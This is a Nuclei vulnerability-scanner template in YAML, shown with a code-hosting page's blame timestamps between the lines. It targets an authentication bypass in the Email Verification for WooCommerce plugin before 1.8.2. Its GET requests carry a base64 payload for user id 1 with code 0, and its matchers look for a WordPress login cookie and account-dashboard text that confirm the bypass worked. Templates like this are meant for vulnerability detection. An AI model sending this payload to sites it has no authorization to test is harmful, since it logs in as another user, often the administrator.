nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-email-verifi...

35 lines
901 B
YAML
Raw Normal View History

id: wp-woocommerce-email-verification
2022-03-26 11:15:50 +00:00
info:
name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
author: random_robbie,daffianfo
severity: critical
reference:
- https://wpvulndb.com/vulnerabilities/10318
2022-03-26 11:15:50 +00:00
tags: wordpress,wp-plugin,woocommerce
requests:
- method: GET
path:
- "{{BaseURL}}/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
- "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
stop-at-first-match: true
matchers-condition: and
matchers:
2022-03-26 11:15:50 +00:00
- type: regex
2021-01-11 06:44:22 +00:00
part: header
2022-03-26 11:15:50 +00:00
regex:
- "wordpress_logged_in_[a-z0-9]{32}"
2021-01-11 06:44:22 +00:00
- type: word
part: body
words:
- "Your account has been activated!"
- "From your account dashboard you can view your"
condition: and
- type: status
status:
- 200